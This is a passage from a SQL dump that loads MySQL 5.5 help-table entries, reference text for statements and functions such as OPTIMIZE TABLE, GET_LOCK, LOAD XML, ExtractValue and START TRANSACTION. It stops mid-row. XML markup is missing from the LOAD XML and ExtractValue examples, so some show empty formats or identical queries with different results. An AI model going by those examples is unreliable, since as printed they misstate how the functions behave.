space and improve I/O efficiency when accessing\nthe table. The exact changes made to each table depend on the storage\nengine used by that table. This statement does not work with views.\n\nUse OPTIMIZE TABLE in these cases, depending on the type of table:\n\no After doing substantial insert, update, or delete operations on an\n InnoDB table that has its own .ibd file because it was created with\n the innodb_file_per_table option enabled. The table and indexes are\n reorganized, and disk space can be reclaimed for use by the operating\n system.\n\no After deleting a large part of a MyISAM or ARCHIVE table, or making\n many changes to a MyISAM or ARCHIVE table with variable-length rows\n (tables that have VARCHAR, VARBINARY, BLOB, or TEXT columns). Deleted\n rows are maintained in a linked list and subsequent INSERT operations\n reuse old row positions. You can use OPTIMIZE TABLE to reclaim the\n unused space and to defragment the data file. After extensive changes\n to a table, this statement may also improve performance of statements\n that use the table, sometimes significantly.\n\nThis statement requires SELECT and INSERT privileges for the table.\n\nOPTIMIZE TABLE is also supported for partitioned tables. For\ninformation about using this statement with partitioned tables and\ntable partitions, see\nhttp://dev.mysql.com/doc/refman/5.5/en/partitioning-maintenance.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/optimize-table.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/optimize-table.html'),(117,'DECODE',12,'Syntax:\nDECODE(crypt_str,pass_str)\n\nDecrypts the encrypted string crypt_str using pass_str as the password.\ncrypt_str should be a string returned from ENCODE().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html'),(118,'<=>',20,'Syntax:\n<=>\n\nNULL-safe equal. This operator performs an equality comparison like the\n= operator, but returns 1 rather than NULL if both operands are NULL,\nand 0 rather than NULL if one operand is NULL.\n\nThe <=> operator is equivalent to the standard SQL IS NOT DISTINCT FROM\noperator.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html\n\n','mysql> SELECT 1 <=> 1, NULL <=> NULL, 1 <=> NULL;\n -> 1, 1, 0\nmysql> SELECT 1 = 1, NULL = NULL, 1 = NULL;\n -> 1, NULL, NULL\n','http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html'),(119,'HELP STATEMENT',29,'Syntax:\nHELP \'search_string\'\n\nThe HELP statement returns online information from the MySQL Reference\nmanual. Its proper operation requires that the help tables in the mysql\ndatabase be initialized with help topic information (see\nhttp://dev.mysql.com/doc/refman/5.5/en/server-side-help-support.html).\n\nThe HELP statement searches the help tables for the given search string\nand displays the result of the search. The search string is not case\nsensitive.\n\nThe search string can contain the wildcard characters \"%\" and \"_\".\nThese have the same meaning as for pattern-matching operations\nperformed with the LIKE operator. For example, HELP \'rep%\' returns a\nlist of topics that begin with rep.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/help.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/help.html'),(120,'RESET',27,'Syntax:\nRESET reset_option [, reset_option] ...\n\nThe RESET statement is used to clear the state of various server\noperations. You must have the RELOAD privilege to execute RESET.\n\nRESET acts as a stronger version of the FLUSH statement. See [HELP\nFLUSH].\n\nThe RESET statement causes an implicit commit. See\nhttp://dev.mysql.com/doc/refman/5.5/en/implicit-commit.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/reset.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/reset.html'),(121,'GET_LOCK',14,'Syntax:\nGET_LOCK(str,timeout)\n\nTries to obtain a lock with a name given by the string str, using a\ntimeout of timeout seconds. Before MySQL 5.5.8, a negative timeout\nvalue means infinite timeout on Windows. As of 5.5.8, this behavior\napplies on all platforms.\n\nReturns 1 if the lock was obtained successfully, 0 if the attempt timed\nout (for example, because another client has previously locked the\nname), or NULL if an error occurred (such as running out of memory or\nthe thread was killed with mysqladmin kill).\n\nA lock obtained with GET_LOCK() is released explicitly by executing\nRELEASE_LOCK() or implicitly when your session terminates (either\nnormally or abnormally).\n\nLocks obtained with GET_LOCK() are not released when transactions\ncommit or roll back.\n\nGET_LOCK() can be used to implement application locks or to simulate\nrecord locks. Names are locked on a server-wide basis. If a name has\nbeen locked within one session, GET_LOCK() blocks any request by\nanother session for a lock with the same name. This enables clients\nthat agree on a given lock name to use the name to perform cooperative\nadvisory locking. But be aware that it also enables a client that is\nnot among the set of cooperating clients to lock a name, either\ninadvertently or deliberately, and thus prevent any of the cooperating\nclients from locking that name. One way to reduce the likelihood of\nthis is to use lock names that are database-specific or\napplication-specific. For example, use lock names of the form\ndb_name.str or app_name.str.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html\n\n','mysql> SELECT GET_LOCK(\'lock1\',10);\n -> 1\nmysql> SELECT IS_FREE_LOCK(\'lock2\');\n -> 1\nmysql> SELECT GET_LOCK(\'lock2\',10);\n -> 1\nmysql> SELECT RELEASE_LOCK(\'lock2\');\n -> 1\nmysql> SELECT RELEASE_LOCK(\'lock1\');\n -> NULL\n','http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html'),(122,'UCASE',38,'Syntax:\nUCASE(str)\n\nUCASE() is a synonym for UPPER().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(123,'SHOW BINLOG EVENTS',27,'Syntax:\nSHOW BINLOG EVENTS\n [IN \'log_name\'] [FROM pos] [LIMIT [offset,] row_count]\n\nShows the events in the binary log. If you do not specify \'log_name\',\nthe first binary log is displayed.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-binlog-events.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-binlog-events.html'),(124,'MPOLYFROMWKB',33,'MPolyFromWKB(wkb[,srid]), MultiPolygonFromWKB(wkb[,srid])\n\nConstructs a MultiPolygon value using its WKB representation and SRID.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-wkb-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-wkb-functions.html'),(125,'ITERATE',24,'Syntax:\nITERATE label\n\nITERATE can appear only within LOOP, REPEAT, and WHILE statements.\nITERATE means \"start the loop again.\"\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/iterate.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/iterate.html'),(126,'DO',28,'Syntax:\nDO expr [, expr] ...\n\nDO executes the expressions but does not return any results. In most\nrespects, DO is shorthand for SELECT expr, ..., but has the advantage\nthat it is slightly faster when you do not care about the result.\n\nDO is useful primarily with functions that have side effects, such as\nRELEASE_LOCK().\n\nExample: This SELECT statement pauses, but also produces a result set:\n\nmysql> SELECT SLEEP(5);\n+----------+\n| SLEEP(5) |\n+----------+\n| 0 |\n+----------+\n1 row in set (5.02 sec)\n\nDO, on the other hand, pauses without producing a result set.:\n\nmysql> DO SLEEP(5);\nQuery OK, 0 rows affected (4.99 sec)\n\nThis could be useful, for example in a stored function or trigger,\nwhich prohibit statements that produce result sets.\n\nDO only executes expressions. It cannot be used in all cases where\nSELECT can be used. For example, DO id FROM t1 is invalid because it\nreferences a table.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/do.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/do.html'),(127,'CURTIME',32,'Syntax:\nCURTIME()\n\nReturns the current time as a value in \'HH:MM:SS\' or HHMMSS.uuuuuu\nformat, depending on whether the function is used in a string or\nnumeric context. The value is expressed in the current time zone.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT CURTIME();\n -> \'23:50:26\'\nmysql> SELECT CURTIME() + 0;\n -> 235026.000000\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(128,'CHAR_LENGTH',38,'Syntax:\nCHAR_LENGTH(str)\n\nReturns the length of the string str, measured in characters. A\nmultibyte character counts as a single character. This means that for a\nstring containing five 2-byte characters, LENGTH() returns 10, whereas\nCHAR_LENGTH() returns 5.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(129,'BIGINT',23,'BIGINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA large integer. The signed range is -9223372036854775808 to\n9223372036854775807. The unsigned range is 0 to 18446744073709551615.\n\nSERIAL is an alias for BIGINT UNSIGNED NOT NULL AUTO_INCREMENT UNIQUE.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html'),(130,'SET',27,'Syntax:\nSET variable_assignment [, variable_assignment] ...\n\nvariable_assignment:\n user_var_name = expr\n | [GLOBAL | SESSION] system_var_name = expr\n | [@@global. | @@session. | @@]system_var_name = expr\n\nThe SET statement assigns values to different types of variables that\naffect the operation of the server or your client. Older versions of\nMySQL employed SET OPTION, but this syntax is deprecated in favor of\nSET without OPTION.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/set-statement.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/set-statement.html'),(131,'LOAD XML',28,'Syntax:\nLOAD XML [LOW_PRIORITY | CONCURRENT] [LOCAL] INFILE \'file_name\'\n [REPLACE | IGNORE]\n INTO TABLE [db_name.]tbl_name\n [CHARACTER SET charset_name]\n [ROWS IDENTIFIED BY \'\']\n [IGNORE number {LINES | ROWS}]\n [(field_name_or_user_var,...)]\n [SET col_name = expr,...]\n\nThe LOAD XML statement reads data from an XML file into a table. The\nfile_name must be given as a literal string. The tagname in the\noptional ROWS IDENTIFIED BY clause must also be given as a literal\nstring, and must be surrounded by angle brackets (< and >).\n\nLOAD XML acts as the complement of running the mysql client in XML\noutput mode (that is, starting the client with the --xml option). To\nwrite data from a table to an XML file, you can invoke the mysql client\nwith the --xml and -e options from the system shell, as shown here:\n\nshell> mysql --xml -e \'SELECT * FROM mydb.mytable\' > file.xml\n\nTo read the file back into a table, use LOAD XML INFILE. By default,\nthe element is considered to be the equivalent of a database\ntable row; this can be changed using the ROWS IDENTIFIED BY clause.\n\nThis statement supports three different XML formats:\n\no Column names as attributes and column values as attribute values:\n\n\n\no Column names as tags and column values as the content of these tags:\n\n\n value1\n value2\n\n\no Column names are the name attributes of tags, and values are\n the contents of these tags:\n\n\n value1\n value2\n\n\n This is the format used by other MySQL tools, such as mysqldump.\n\nAll three formats can be used in the same XML file; the import routine\nautomatically detects the format for each row and interprets it\ncorrectly. Tags are matched based on the tag or attribute name and the\ncolumn name.\n\nPrior to MySQL 5.5.46, LOAD XML did not handle empty XML elements in\nthe form correctly. (Bug #67542, Bug #16171518)\n\nThe following clauses work essentially the same way for LOAD XML as\nthey do for LOAD DATA:\n\no LOW_PRIORITY or CONCURRENT\n\no LOCAL\n\no REPLACE or IGNORE\n\no CHARACTER SET\n\no SET\n\nSee [HELP LOAD DATA], for more information about these clauses.\n\n(field_name_or_user_var, ...) is a comma-separated list of one or more\nXML fields or user variables. The name of a user variable used for this\npurpose must match the name of a field from the XML file, prefixed with\n@. You can use field names to select only desired fields. User\nvariables can be employed to store the corresponding field values for\nsubsequent re-use.\n\nThe IGNORE number LINES or IGNORE number ROWS clause causes the first\nnumber rows in the XML file to be skipped. It is analogous to the LOAD\nDATA statement\'s IGNORE ... LINES clause.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/load-xml.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/load-xml.html'),(132,'CONV',3,'Syntax:\nCONV(N,from_base,to_base)\n\nConverts numbers between different number bases. Returns a string\nrepresentation of the number N, converted from base from_base to base\nto_base. Returns NULL if any argument is NULL. The argument N is\ninterpreted as an integer, but may be specified as an integer or a\nstring. The minimum base is 2 and the maximum base is 36. If to_base is\na negative number, N is regarded as a signed number. Otherwise, N is\ntreated as unsigned. CONV() works with 64-bit precision.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT CONV(\'a\',16,2);\n -> \'1010\'\nmysql> SELECT CONV(\'6E\',18,8);\n -> \'172\'\nmysql> SELECT CONV(-17,10,-18);\n -> \'-H\'\nmysql> SELECT CONV(10+\'10\'+\'10\'+0xa,10,10);\n -> \'40\'\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(133,'DATE',23,'DATE\n\nA date. The supported range is \'1000-01-01\' to \'9999-12-31\'. MySQL\ndisplays DATE values in \'YYYY-MM-DD\' format, but permits assignment of\nvalues to DATE columns using either strings or numbers.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-type-overview.html'),(134,'ASSIGN-VALUE',15,'Syntax:\n:=\n\nAssignment operator. Causes the user variable on the left hand side of\nthe operator to take on the value to its right. The value on the right\nhand side may be a literal value, another variable storing a value, or\nany legal expression that yields a scalar value, including the result\nof a query (provided that this value is a scalar value). You can\nperform multiple assignments in the same SET statement. You can perform\nmultiple assignments in the same statement-\n\nUnlike =, the := operator is never interpreted as a comparison\noperator. This means you can use := in any valid SQL statement (not\njust in SET statements) to assign a value to a variable.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/assignment-operators.html\n\n','mysql> SELECT @var1, @var2;\n -> NULL, NULL\nmysql> SELECT @var1 := 1, @var2;\n -> 1, NULL\nmysql> SELECT @var1, @var2;\n -> 1, NULL\nmysql> SELECT @var1, @var2 := @var1;\n -> 1, 1\nmysql> SELECT @var1, @var2;\n -> 1, 1\n\nmysql> SELECT @var1:=COUNT(*) FROM t1;\n -> 4\nmysql> SELECT @var1;\n -> 4\n','http://dev.mysql.com/doc/refman/5.5/en/assignment-operators.html'),(135,'SHOW OPEN TABLES',27,'Syntax:\nSHOW OPEN TABLES [{FROM | IN} db_name]\n [LIKE \'pattern\' | WHERE expr]\n\nSHOW OPEN TABLES lists the non-TEMPORARY tables that are currently open\nin the table cache. See\nhttp://dev.mysql.com/doc/refman/5.5/en/table-cache.html. The FROM\nclause, if present, restricts the tables shown to those present in the\ndb_name database. The LIKE clause, if present, indicates which table\nnames to match. The WHERE clause can be given to select rows using more\ngeneral conditions, as discussed in\nhttp://dev.mysql.com/doc/refman/5.5/en/extended-show.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-open-tables.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-open-tables.html'),(136,'EXTRACT',32,'Syntax:\nEXTRACT(unit FROM date)\n\nThe EXTRACT() function uses the same kinds of unit specifiers as\nDATE_ADD() or DATE_SUB(), but extracts parts from the date rather than\nperforming date arithmetic.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT EXTRACT(YEAR FROM \'2009-07-02\');\n -> 2009\nmysql> SELECT EXTRACT(YEAR_MONTH FROM \'2009-07-02 01:02:03\');\n -> 200907\nmysql> SELECT EXTRACT(DAY_MINUTE FROM \'2009-07-02 01:02:03\');\n -> 20102\nmysql> SELECT EXTRACT(MICROSECOND\n -> FROM \'2003-01-02 10:30:00.000123\');\n -> 123\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(137,'ENCRYPT',12,'Syntax:\nENCRYPT(str[,salt])\n\nEncrypts str using the Unix crypt() system call and returns a binary\nstring. The salt argument must be a string with at least two characters\nor the result will be NULL. If no salt argument is given, a random\nvalue is used.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html\n\n','mysql> SELECT ENCRYPT(\'hello\');\n -> \'VxuFAJXVARROc\'\n','http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html'),(138,'SHOW STATUS',27,'Syntax:\nSHOW [GLOBAL | SESSION] STATUS\n [LIKE \'pattern\' | WHERE expr]\n\nSHOW STATUS provides server status information (see\nhttp://dev.mysql.com/doc/refman/5.5/en/server-status-variables.html).\nThis statement does not require any privilege. It requires only the\nability to connect to the server.\n\nStatus variable information is also available from these sources:\n\no The GLOBAL_STATUS and SESSION_STATUS tables. See\n http://dev.mysql.com/doc/refman/5.5/en/status-table.html.\n\no The mysqladmin extended-status command. See\n http://dev.mysql.com/doc/refman/5.5/en/mysqladmin.html.\n\nFor SHOW STATUS, a LIKE clause, if present, indicates which variable\nnames to match. A WHERE clause can be given to select rows using more\ngeneral conditions, as discussed in\nhttp://dev.mysql.com/doc/refman/5.5/en/extended-show.html.\n\nSHOW STATUS accepts an optional GLOBAL or SESSION variable scope\nmodifier:\n\no With a GLOBAL modifier, the statement displays the global status\n values. A global status variable may represent status for some aspect\n of the server itself (for example, Aborted_connects), or the\n aggregated status over all connections to MySQL (for example,\n Bytes_received and Bytes_sent). If a variable has no global value,\n the session value is displayed.\n\no With a SESSION modifier, the statement displays the status variable\n values for the current connection. If a variable has no session\n value, the global value is displayed. LOCAL is a synonym for SESSION.\n\no If no modifier is present, the default is SESSION.\n\nThe scope for each status variable is listed at\nhttp://dev.mysql.com/doc/refman/5.5/en/server-status-variables.html.\n\nEach invocation of the SHOW STATUS statement uses an internal temporary\ntable and increments the global Created_tmp_tables value.\nWith a LIKE clause, the statement displays only rows for those\nvariables with names that match the pattern:\n\nmysql> SHOW STATUS LIKE \'Key%\';\n+--------------------+----------+\n| Variable_name | Value |\n+--------------------+----------+\n| Key_blocks_used | 14955 |\n| Key_read_requests | 96854827 |\n| Key_reads | 162040 |\n| Key_write_requests | 7589728 |\n| Key_writes | 3813196 |\n+--------------------+----------+\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-status.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-status.html'),(139,'EXTRACTVALUE',38,'Syntax:\nExtractValue(xml_frag, xpath_expr)\n\nExtractValue() takes two string arguments, a fragment of XML markup\nxml_frag and an XPath expression xpath_expr (also known as a locator);\nit returns the text (CDATA) of the first text node which is a child of\nthe elements or elements matched by the XPath expression. In MySQL 5.5,\nthe XPath expression can contain at most 127 characters. (This\nlimitation is lifted in MySQL 5.6.)\n\nUsing this function is the equivalent of performing a match using the\nxpath_expr after appending /text(). In other words,\nExtractValue(\'Sakila\', \'/a/b\') and\nExtractValue(\'Sakila\', \'/a/b/text()\') produce the same\nresult.\n\nIf multiple matches are found, the content of the first child text node\nof each matching element is returned (in the order matched) as a\nsingle, space-delimited string.\n\nIf no matching text node is found for the expression (including the\nimplicit /text())---for whatever reason, as long as xpath_expr is\nvalid, and xml_frag consists of elements which are properly nested and\nclosed---an empty string is returned. No distinction is made between a\nmatch on an empty element and no match at all. This is by design.\n\nIf you need to determine whether no matching element was found in\nxml_frag or such an element was found but contained no child text\nnodes, you should test the result of an expression that uses the XPath\ncount() function. For example, both of these statements return an empty\nstring, as shown here:\n\nmysql> SELECT ExtractValue(\'\', \'/a/b\');\n+-------------------------------------+\n| ExtractValue(\'\', \'/a/b\') |\n+-------------------------------------+\n| |\n+-------------------------------------+\n1 row in set (0.00 sec)\n\nmysql> SELECT ExtractValue(\'\', \'/a/b\');\n+-------------------------------------+\n| ExtractValue(\'\', \'/a/b\') |\n+-------------------------------------+\n| |\n+-------------------------------------+\n1 row in set (0.00 sec)\n\nHowever, you can determine whether there was actually a matching\nelement using the following:\n\nmysql> SELECT ExtractValue(\'\', \'count(/a/b)\');\n+-------------------------------------+\n| ExtractValue(\'\', \'count(/a/b)\') |\n+-------------------------------------+\n| 1 |\n+-------------------------------------+\n1 row in set (0.00 sec)\n\nmysql> SELECT ExtractValue(\'\', \'count(/a/b)\');\n+-------------------------------------+\n| ExtractValue(\'\', \'count(/a/b)\') |\n+-------------------------------------+\n| 0 |\n+-------------------------------------+\n1 row in set (0.01 sec)\n\n*Important*: ExtractValue() returns only CDATA, and does not return any\ntags that might be contained within a matching tag, nor any of their\ncontent (see the result returned as val1 in the following example).\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/xml-functions.html\n\n','mysql> SELECT\n -> ExtractValue(\'cccddd\', \'/a\') AS val1,\n -> ExtractValue(\'cccddd\', \'/a/b\') AS val2,\n -> ExtractValue(\'cccddd\', \'//b\') AS val3,\n -> ExtractValue(\'cccddd\', \'/b\') AS val4,\n -> ExtractValue(\'cccdddeee\', \'//b\') AS val5;\n\n+------+------+------+------+---------+\n| val1 | val2 | val3 | val4 | val5 |\n+------+------+------+------+---------+\n| ccc | ddd | ddd | | ddd eee |\n+------+------+------+------+---------+\n','http://dev.mysql.com/doc/refman/5.5/en/xml-functions.html'),(140,'OLD_PASSWORD',12,'Syntax:\nOLD_PASSWORD(str)\n\nOLD_PASSWORD() was added when the implementation of PASSWORD() was\nchanged in MySQL 4.1 to improve security. OLD_PASSWORD() returns the\nvalue of the pre-4.1 implementation of PASSWORD() as a string, and is\nintended to permit you to reset passwords for any pre-4.1 clients that\nneed to connect to your version 5.5 MySQL server without locking them\nout. See http://dev.mysql.com/doc/refman/5.5/en/password-hashing.html.\n\nAs of MySQL 5.5.3, the return value is a nonbinary string in the\nconnection character set. Before 5.5.3, the return value is a binary\nstring.\n\n*Note*: Passwords that use the pre-4.1 hashing method are less secure\nthan passwords that use the native password hashing method and should\nbe avoided.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html'),(141,'FORMAT',38,'Syntax:\nFORMAT(X,D[,locale])\n\nFormats the number X to a format like \'#,###,###.##\', rounded to D\ndecimal places, and returns the result as a string. If D is 0, the\nresult has no decimal point or fractional part.\n\nThe optional third parameter enables a locale to be specified to be\nused for the result number\'s decimal point, thousands separator, and\ngrouping between separators. Permissible locale values are the same as\nthe legal values for the lc_time_names system variable (see\nhttp://dev.mysql.com/doc/refman/5.5/en/locale-support.html). If no\nlocale is specified, the default is \'en_US\'.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT FORMAT(12332.123456, 4);\n -> \'12,332.1235\'\nmysql> SELECT FORMAT(12332.1,4);\n -> \'12,332.1000\'\nmysql> SELECT FORMAT(12332.2,0);\n -> \'12,332\'\nmysql> SELECT FORMAT(12332.2,2,\'de_DE\');\n -> \'12.332,20\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(142,'BIT_LENGTH',38,'Syntax:\nBIT_LENGTH(str)\n\nReturns the length of the string str in bits.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT BIT_LENGTH(\'text\');\n -> 32\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(143,'EXTERIORRING',2,'ExteriorRing(poly)\n\nReturns the exterior ring of the Polygon value poly as a LineString.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-polygon-property-functions.html\n\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT AsText(ExteriorRing(GeomFromText(@poly)));\n+-------------------------------------------+\n| AsText(ExteriorRing(GeomFromText(@poly))) |\n+-------------------------------------------+\n| LINESTRING(0 0,0 3,3 3,3 0,0 0) |\n+-------------------------------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/gis-polygon-property-functions.html'),(144,'GEOMFROMWKB',33,'GeomFromWKB(wkb[,srid]), GeometryFromWKB(wkb[,srid])\n\nConstructs a geometry value of any type using its WKB representation\nand SRID.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-wkb-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-wkb-functions.html'),(145,'SHOW SLAVE HOSTS',27,'Syntax:\nSHOW SLAVE HOSTS\n\nDisplays a list of replication slaves currently registered with the\nmaster. (Before MySQL 5.5.3, only slaves started with the\n--report-host=host_name option are visible in this list.)\n\nSHOW SLAVE HOSTS should be executed on a server that acts as a\nreplication master. The statement displays information about servers\nthat are or have been connected as replication slaves, with each row of\nthe result corresponding to one slave server, as shown here:\n\nmysql> SHOW SLAVE HOSTS;\n+------------+-----------+------+-----------+\n| Server_id | Host | Port | Master_id |\n+------------+-----------+------+-----------+\n| 192168010 | iconnect2 | 3306 | 192168011 |\n| 1921680101 | athena | 3306 | 192168011 |\n+------------+-----------+------+-----------+\n\no Server_id: The unique server ID of the slave server, as configured in\n the slave server\'s option file, or on the command line with\n --server-id=value.\n\no Host: The host name of the slave server as specified on the slave\n with the --report-host option. This can differ from the machine name\n as configured in the operating system.\n\no User: The slave server user name as, specified on the slave with the\n --report-user option. Statement output includes this column only if\n the master server is started with the --show-slave-auth-info option.\n\no Password: The slave server password as, specified on the slave with\n the --report-password option. Statement output includes this column\n only if the master server is started with the --show-slave-auth-info\n option.\n\no Port: The port on the master to which the slave server is listening,\n as specified on the slave with the --report-port option.\n\n In MySQL 5.5.23 and later, a zero in this column means that the slave\n port (--report-port) was not set. Prior to MySQL 5.5.23, 3306 was\n used as the default in such cases (Bug #13333431).\n\no Master_id: The unique server ID of the master server that the slave\n server is replicating from. This is the server ID of the server on\n which SHOW SLAVE HOSTS is executed, so this same value is listed for\n each row in the result.\n\nSome MySQL versions report another variable, Rpl_recovery_rank. This\nvariable was never used, and was removed in MySQL 5.5.3. (Bug #13963)\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-slave-hosts.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-slave-hosts.html'),(146,'START TRANSACTION',8,'Syntax:\nSTART TRANSACTION [WITH CONSISTENT SNAPSHOT]\nBEGIN [WORK]\nCOMMIT [WORK] [AND [NO] CHAIN] [[NO] RELEASE]\nROLLBACK [WORK] [AND [NO] CHAIN] [[NO] RELEASE]\nSET autocommit = {0 | 1}\n\nThese statements provide control over use of transactions:\n\no START TRANSACTION or BEGIN start a new transaction.\n\no COMMIT commits the current transaction, making its changes permanent.\n\no ROLLBACK rolls back the current transaction, canceling its changes.\n\no SET autocommit disables or enables the default autocommit mode for\n the current session.\n\nBy default, MySQL runs with autocommit mode enabled. This means that as\nsoon as you execute a statement that updates (modifies) a table, MySQL\nstores the update on disk to make it permanent. The change cannot be\nrolled back.\n\nTo disable autocommit mode implicitly for a single series of\nstatements, use the START TRANSACTION statement:\n\nSTART TRANSACTION;\nSELECT @A:=SUM(salary) FROM table1 WHERE type=1;\nUPDATE table2 SET summary=@A WHERE type=1;\nCOMMIT;\n\nWith START TRANSACTION, autocommit remains disabled until you end the\ntransaction with COMMIT or ROLLBACK. The autocommit mode then reverts\nto its previous state.\n\nYou can also begin a transaction like this:\n\nSTART TRANSACTION WITH CONSISTENT SNAPSHOT;\n\nThe WITH CONSISTENT SNAPSHOT option starts a consistent read for\nstorage engines that are capable of it. This applies only to InnoDB.\nThe effect is the same as issuing a START TRANSACTION followed by a\nSELECT from any InnoDB table. See\nhttp://dev.mysql.com/doc/refman/5.5/en/innodb-consistent-read.html. The\nWITH CONSISTENT SNAPSHOT option does not change the current transaction\nisolation level, so it provides a consistent snapshot only if the\ncurrent isolation level is one that permits a consistent read. The only\nisolation level that permits a consistent read is REPEATABLE READ. For\nall other isolation levels, the WITH CONSISTENT SNAPSHOT clause is\nignored. As of MySQL 5.5.34, a warning is generated when the WITH\nCONSISTENT SNAPSHOT is ignored.\n\n*Important*: Many APIs used for writing MySQL client applications (such\nas JDBC) provide their own methods for starting transactions that can\n(and sometimes should) be used instead of sending a START TRANSACTION\nstatement from the client. See\nhttp://dev.mysql.com/doc/refman/5.5/en/connectors-apis.html, or the\ndocumentation for your API, for more information.\n\nTo disable autocommit mode explicitly, use the following statement:\n\nSET autocommit=0;\n\nAfter disabling autocommit mode by setting the autocommit variable to\nzero, changes to transaction-safe tables (such as those for InnoDB or\nNDBCLUSTER) are not made permanent immediately. You must use COMMIT to\nstore your changes to disk or ROLLBACK to ignore the changes.\n\nautocommit is a session variable and must be set for each session. To\ndisable autocommit mode for each new connection, see the description of\nthe autocommit system variable at\nhttp://dev.mysql.com/doc/refman/5.5/en/server-system-variables.html.\n\nBEGIN and BEGIN WORK are supported as aliases of START TRANSACTION for\ninitiating a transaction. START TRANSACTION is standard SQL syntax and\nis the recommended way to start an ad-hoc transaction.\n\nThe BEGIN statement differs from the use of the BEGIN keyword that\nstarts a BEGIN ... END compound statement. The latter does not begin a\ntransaction. See [HELP BEGIN END].\n\n*Note*: Within all stored programs (stored procedures and functions,\ntriggers, and events), the parser treats BEGIN [WORK] as the beginning\nof a BEGIN ... END block. Begin a transaction in this context with\nSTART TRANSACTION instead.\n\nThe optional WORK keyword is supported for COMMIT and ROLLBACK, as are\nthe CHAIN and RELEASE clauses. CHAIN and RELEASE can be used for\nadditional control over transaction completion. The value of the\ncompletion_type system variable determines the default completion\nbehavior. See\nhttp://dev.mysql.com/doc/refman/5.5/en/server-system-variables.html.\n\nThe AND CHAIN clause causes a new transaction to begin as soon as the\ncurrent one ends, and the new transaction has the same isolation level\nas the just-terminated transaction. The RELEASE clause causes the\nserver to disconnect the current client session after terminating the\ncurrent transaction. Including the NO keyword suppresses CHAIN or\nRELEASE completion, which can be useful if the completion_type system\nvariable is set to cause chaining or release completion by default.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/commit.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/commit.html'),(147,'BETWEEN AND',20,'Syntax:\nexpr BETWEEN min AND max\n\nIf expr is greater than or equal to min and expr is less than or equal\nto max, BETWEEN returns 1, otherwise it returns 0. This is equivalent\nto the expression (min <= expr AND expr <= max) if all the arguments\nare of the same type. Otherwise type conversion takes place according\nto the rules described in\nhttp://dev.mysql.com/doc/refman/5.5/en/type-conversion.html, but\napplied to all the three arguments.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html\n\n','mysql> SELECT 2 BETWEEN 1 AND 3, 2 BETWEEN 3 and 1;\n -> 1, 0\nmysql> SELECT 1 BETWEEN 2 AND 3;\n -> 0\nmysql> SELECT \'b\' BETWEEN \'a\' AND \'c\';\n -> 1\nmysql> SELECT 2 BETWEEN 2 